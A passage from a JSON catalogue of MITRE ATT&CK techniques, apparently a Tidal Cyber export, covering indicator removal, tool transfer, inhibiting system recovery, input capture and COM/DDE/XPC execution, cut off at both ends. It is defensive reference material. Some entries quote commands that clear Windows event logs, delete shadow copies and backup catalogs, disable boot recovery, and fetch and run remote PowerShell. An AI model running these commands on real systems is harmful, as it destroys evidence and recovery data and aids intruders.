Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b), [Plist File Modification](https://app.tidalcyber.com/technique/ee177ad0-d282-42c0-91f9-7bcf724e3d31), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)] Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce)).[[Talos - Cisco Attack 2022](https://app.tidalcyber.com/references/143182ad-6a16-5a0d-a5c4-7dae721a9e26)]\n\nIn some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.[[NCC Group Team9 June 2020](https://app.tidalcyber.com/references/0ea8f87d-e19d-438d-b05b-30f2ccd0ea3b)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1070.009" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "e6dac24d-672c-4cae-82e7-2bf21014633c", + "value": "Clear Persistence" + }, + { + "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nThe event logs can be cleared with the following utility commands:\n\n* wevtutil cl system\n* wevtutil cl application\n* wevtutil cl security\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1070.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "fc34e661-55c3-47be-a368-c2f5776cdd17", + "value": "Clear Windows Event Logs" + }, + { + "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.[[Microsoft SDelete July 2016](https://app.tidalcyber.com/references/356c7d49-5abc-4566-9657-5ce58cf7be67)] Examples of built-in [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) functions include del on Windows and rm or unlink on Linux and macOS.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1070.004" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "d36695d0-e4ab-4b8a-9c65-bab3cc34ef2c", + "value": "File Deletion" + }, + { + "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) connections can be removed when no longer needed. [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) is an example utility that can be used to remove network share connections with the net use \\\\system\\share /delete command. [[Technet Net Use](https://app.tidalcyber.com/references/f761d4b6-8fc5-4037-aa34-7982c17f8bed)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1070.005" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "8325f2fd-35a3-4c0c-895d-7c82dd4ba2fb", + "value": "Network Share Connection Removal" + }, + { + "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to hide malware and tools.[[WindowsIR Anti-Forensic Techniques](https://app.tidalcyber.com/references/646211a7-77be-4e5a-bd02-eeb70d67113d)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1070.006" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "e8866e77-f0ca-4a19-b83e-d33dbafaf21b", + "value": "Timestomp" + }, + { + "description": "Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.\n\nRemoval of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.", + "meta": { + "platforms": [ + "Containers", + "Google Workspace", + "Linux", + "macOS", + "Network", + "Office 365", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "074cf118-cd7f-41c2-bb54-43380bfa45ca", + "type": "similar" + }, + { + "dest-uuid": "2f32c30e-b79a-497a-b05f-ab8bd93aa689", + "type": "similar" + }, + { + "dest-uuid": "64fd8f4d-5725-46c8-a37a-020a706db1e4", + "type": "similar" + }, + { + "dest-uuid": "39d589f9-fa73-4988-95e2-2a022851d8b8", + "type": "similar" + }, + { + "dest-uuid": "e6dac24d-672c-4cae-82e7-2bf21014633c", + "type": "similar" + }, + { + "dest-uuid": "fc34e661-55c3-47be-a368-c2f5776cdd17", + "type": "similar" + }, + { + "dest-uuid": "d36695d0-e4ab-4b8a-9c65-bab3cc34ef2c", + "type": "similar" + }, + { + "dest-uuid": "8325f2fd-35a3-4c0c-895d-7c82dd4ba2fb", + "type": "similar" + }, + { + "dest-uuid": "e8866e77-f0ca-4a19-b83e-d33dbafaf21b", + "type": "similar" + } + ], + "uuid": "fa1507f1-c763-4af1-8bd9-a2fb8f7904be", + "value": "Indicator Removal" + }, + { + "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8). For example, [Forfiles](https://app.tidalcyber.com/software/c6dc67a6-587d-4700-a7de-bee043a0031a), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), Run window, or via scripts. [[VectorSec ForFiles Aug 2017](https://app.tidalcyber.com/references/8088d15d-9512-4d12-a99a-c76ad9dc3390)] [[Evi1cg Forfiles Nov 2017](https://app.tidalcyber.com/references/b292b85e-68eb-43c3-9b5b-222810e2f26a)]\n\nAdversaries may abuse these features for [Defense Evasion](https://app.tidalcyber.com/tactics/8e29c6c9-0c10-4bb0-827d-ff0ab8922726), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or file extensions more commonly associated with malicious payloads.", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "91e79eb9-7f99-4890-8bef-9543d307206d", + "value": "Indirect Command Execution" + }, + { + "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043), and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.[[t1105_lolbas](https://app.tidalcyber.com/references/80e649f5-6c74-4d66-a452-4f4cd51501da)]\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts.\n\nFiles can also be transferred using various [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s as well as native or otherwise present tools on the victim system.[[PTSecurity Cobalt Dec 2016](https://app.tidalcyber.com/references/2de4d38f-c99d-4149-89e6-0349a4902aa2)] In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "4499ce34-9871-4879-883c-19ddb940f242", + "value": "Ingress Tool Transfer" + }, + { + "description": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)][[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)] This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3).[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)][[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)] Furthermore, adversaries may disable recovery notifications, then corrupt backups.[[disable_notif_synology_ransom](https://app.tidalcyber.com/references/d53e8f89-df78-565b-a316-cf2644c5ed36)]\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no\n* REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system\n\nOn network devices, adversaries may leverage [Disk Wipe](https://app.tidalcyber.com/technique/ea2b3980-05fd-41a3-8ab9-3106e833c821) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.\n\nAdversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.[[ZDNet Ransomware Backups 2020](https://app.tidalcyber.com/references/301da9c8-60de-58f0-989f-6b504e3457a3)] In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.[[Dark Reading Code Spaces Cyber Attack](https://app.tidalcyber.com/references/e5a3028a-f4cc-537c-9ddd-769792ab33be)][[Rhino Security Labs AWS S3 Ransomware](https://app.tidalcyber.com/references/785c6b11-c5f0-5cb4-931b-cf75fcc368a1)]", + "meta": { + "platforms": [ + "Containers", + "IaaS", + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "d207c03b-fbe7-420e-a053-339f4650c043", + "value": "Inhibit System Recovery" + }, + { + "description": "Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.[[Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017](https://app.tidalcyber.com/references/2b0c16e3-9ea0-455e-ae01-18d9b388fea6)] Unlike [Keylogging](https://app.tidalcyber.com/technique/7f1798b5-b159-441b-a5ef-3b5c706e1699), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.[[Microsoft Hook Overview](https://app.tidalcyber.com/references/54997a52-f78b-4af4-8916-787bcb215ce1)][[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)][[Adlice Software IAT Hooks Oct 2014](https://app.tidalcyber.com/references/9a0e7054-9239-43cd-8e5f-aac8b665be72)][[MWRInfoSecurity Dynamic Hooking 2015](https://app.tidalcyber.com/references/3cb6d0b1-4d6b-4f2d-bd7d-e4b2dcde081d)]\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)][[HighTech Bridge Inline Hooking Sept 2011](https://app.tidalcyber.com/references/39ad1769-3dfb-4572-ab82-1e0c4f869ec8)][[MWRInfoSecurity Dynamic Hooking 2015](https://app.tidalcyber.com/references/3cb6d0b1-4d6b-4f2d-bd7d-e4b2dcde081d)]\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1056.004" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "28fd13d1-b555-47fa-9d47-caf6b1367ace", + "value": "Credential API Hooking" + }, + { + "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.[[OSX Malware Exploits MacKeeper](https://app.tidalcyber.com/references/8c4bcbc7-ff52-4f7b-a22e-98bf9cfb1040)] This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701)[[LogRhythm Do You Trust Oct 2014](https://app.tidalcyber.com/references/88a84f9a-e077-4fdd-9936-30fc7b290476)][[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)][[Spoofing credential dialogs](https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)] and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde).[[LogRhythm Do You Trust Oct 2014](https://app.tidalcyber.com/references/88a84f9a-e077-4fdd-9936-30fc7b290476)][[Enigma Phishing for Credentials Jan 2015](https://app.tidalcyber.com/references/7fff81f0-2b99-4f4f-8eca-c6a54c4d8205)][[Spoofing credential dialogs](https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)] On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7)).[[Spoofing credential dialogs](https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1056.002" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "40ac9bae-173e-467c-80f2-0c1513fc874d", + "value": "GUI Input Capture" + }, + { + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.[[Talos Kimsuky Nov 2021](https://app.tidalcyber.com/references/17927f0e-297a-45ec-8e1c-8a33892205dc)]\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.[[Adventures of a Keystroke](https://app.tidalcyber.com/references/f29ed400-2986-4b2c-9b8a-7dde37562d22)] Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://app.tidalcyber.com/technique/28fd13d1-b555-47fa-9d47-caf6b1367ace), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1056.001" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "7f1798b5-b159-441b-a5ef-3b5c706e1699", + "value": "Keylogging" + }, + { + "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) and [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or as part of the initial compromise by exploitation of the externally facing web service.[[Volexity Virtual Private Keylogging](https://app.tidalcyber.com/references/b299f8e7-01da-4d59-9657-ef93cf284cc0)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1056.003" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "34674b83-86a7-4ad9-8b05-49b505aa5ef0", + "value": "Web Portal Capture" + }, + { + "description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://app.tidalcyber.com/technique/28fd13d1-b555-47fa-9d47-caf6b1367ace)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://app.tidalcyber.com/technique/34674b83-86a7-4ad9-8b05-49b505aa5ef0)).", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + }, + { + "dest-uuid": "28fd13d1-b555-47fa-9d47-caf6b1367ace", + "type": "similar" + }, + { + "dest-uuid": "40ac9bae-173e-467c-80f2-0c1513fc874d", + "type": "similar" + }, + { + "dest-uuid": "7f1798b5-b159-441b-a5ef-3b5c706e1699", + "type": "similar" + }, + { + "dest-uuid": "34674b83-86a7-4ad9-8b05-49b505aa5ef0", + "type": "similar" + } + ], + "uuid": "5ee96331-a7b7-4c32-a8f1-3fb164078f5f", + "value": "Input Capture" + }, + { + "description": "Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.[[Trend Micro When Phishing Starts from the Inside 2017](https://app.tidalcyber.com/references/dbdc2009-a468-439b-bd96-e6153b3fb8a1)]\n\nAdversaries may leverage [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) or [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f) on sites that mimic email login interfaces.\n\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.[[Trend Micro When Phishing Starts from the Inside 2017](https://app.tidalcyber.com/references/dbdc2009-a468-439b-bd96-e6153b3fb8a1)] The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.[[THE FINANCIAL TIMES LTD 2019.](https://app.tidalcyber.com/references/5a01f0b7-86f7-44a1-bf35-46a631402ceb)]", + "meta": { + "platforms": [ + "Google Workspace", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "4f4ea659-7653-4bfd-a525-b2af32c5899b", + "value": "Internal Spearphishing" + }, + { + "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)] Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)] Remote COM execution is facilitated by [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM).[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4).[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)] Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)][[ProjectZero File Write EoP Apr 2018](https://app.tidalcyber.com/references/2c49288b-438d-487a-8e6e-f9d9eda73e2f)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1559.001" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "8bc683db-1311-476f-8cae-45f3f89dcc66", + "value": "Component Object Model" + }, + { + "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.[[BleepingComputer DDE Disabled in Word Dec 2017](https://app.tidalcyber.com/references/d6f93310-77b6-491e-ba9d-ec1faf8de7e4)][[Microsoft ADV170021 Dec 2017](https://app.tidalcyber.com/references/ce960e76-848f-440d-9843-54773f7b11cf)][[Microsoft DDE Advisory Nov 2017](https://app.tidalcyber.com/references/955b0074-a1d6-40b5-9437-bd2548daf54c)]\n\nMicrosoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.[[SensePost PS DDE May 2016](https://app.tidalcyber.com/references/28b3c105-8d64-4767-a735-d353d1fee756)][[Kettle CSV DDE Aug 2014](https://app.tidalcyber.com/references/2badfb63-19a3-4829-bbb5-7c3dfab877d5)][[Enigma Reviving DDE Jan 2018](https://app.tidalcyber.com/references/188a0f02-8d1e-4e4e-b2c0-ddf1bf1bdf93)][[SensePost MacroLess DDE Oct 2017](https://app.tidalcyber.com/references/1036fbbb-f731-458a-b38c-42431612c0ad)] Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.[[OWASP CSV Injection](https://app.tidalcyber.com/references/0cdde66c-a7ae-48a2-8ade-067643de304d)][[CSV Excel Macro Injection ](https://app.tidalcyber.com/references/22c871ff-2701-4809-9f5b-fb29da7481e8)]\n\nDDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c). DDE execution can be invoked remotely via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM).[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1559.002" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "82497cfd-725e-42f8-aaa7-4e20878a6a13", + "value": "Dynamic Data Exchange" + }, + { + "description": "Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API or the high level NSXPCConnection API in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.[[creatingXPCservices](https://app.tidalcyber.com/references/029acdee-95d6-47a7-86de-0f6b925cef9c)][[Designing Daemons Apple Dev](https://app.tidalcyber.com/references/4baac228-1f6a-4c65-ae98-5a542600dfc6)]\n\nAdversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.[[CVMServer Vuln](https://app.tidalcyber.com/references/6f83da0c-d2ce-4923-ba32-c6886eb22587)][[Learn XPC Exploitation](https://app.tidalcyber.com/references/da995792-b78b-4db5-85d8-99fda96c6826)] This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).", + "meta": { + "source": 